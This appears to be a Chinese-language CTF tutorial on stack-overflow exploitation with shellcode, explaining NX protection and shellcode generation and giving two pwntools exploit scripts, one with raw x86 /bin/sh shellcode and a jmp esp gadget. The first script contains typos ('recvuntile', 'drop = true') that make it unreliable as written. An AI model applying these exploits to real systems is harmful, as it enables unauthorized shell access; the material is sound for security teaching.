Shellcode

什么是Shellcode

Shellcode指的是用来完成某个功能的汇编代码,常用的功能就是获取目标系统的shell。在栈溢出的基础上,我们一般都是向栈中写内容,所以要想执行Shellcode,就要要求对应的二进制文件没有开启NX保护。利用ret_address返回Shellcode处执行

怎么生成Shellcode

Shellcode的生成方法通常有以下几种:

  1. 在pwntools中由shellcraft模块生成
  2. https://www.exploit-db.com/shellcodes/网站中根据平台和系统的位数获取
  3. 通过Metasploit生成

1、根据pwntools生成Shellcode

例题:附件下载

查看保护没有开NX,可以用Shellcode

IDA反编译发现栈溢出,直接用Shellcode覆盖main_addr地址控制程序流

1
2
3
4
5
6
7
8
9
from pwn import *
context.arch = "i386"
p = process('./ret2shellcode')
p.recvuntil("ret2shellcode")
target = int(p.recvuntile("\n",drop = true) , 16)
sc = asm(shellcraft.sh())
payload = sc.ljust(0x108 ,'\x00') + p32(1) + p32(target)
p.sendline(payload)
p.interactive()

解释:target = int(p.recvuntile(“\n”,drop = true) , 16)接收直到换行符,并且去除换行符,转换为16进制

2、Shellcode进阶

例题:https://gitee.com/tky5216/CTF/blob/master/PWN/stack/b0verfl0w

没有开NX保护,可以使用Shellccode

发现溢出十八个字节,非常小,所以用pwntools生成的Shellcode长度太长,这里需要用gadget来控制EIP的位置,跳转到Shellcode的初始地址

1
2
3
4
5
6
7
8
9
from pwn import *
p = process('./b0verfl0w')

shellcode_x86 = '\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80'
sub_esp_jmp = asm('sub esp , 0x28;jmp esp')
jmp_esp = 0x08048504
payload = shellcode_x86.ljust(0x24 , 'a') +  p32(jmp_esp) + sub_esp_jmp
p.sendline(payload)
p.interactive()

从payload起始地址开始构造Shellcode,之后调整esp到Shellcode起始位置

为什么要用jmp_esp而不是直接用Shellcode覆盖返回地址?
当pop main_addr后esp在main_上边,直接执行sub_esp_jmp在栈外执行,会异常,所以我们要把EIP调整到栈内再把EIP控制到sub_esp_jmp这样就没有问题了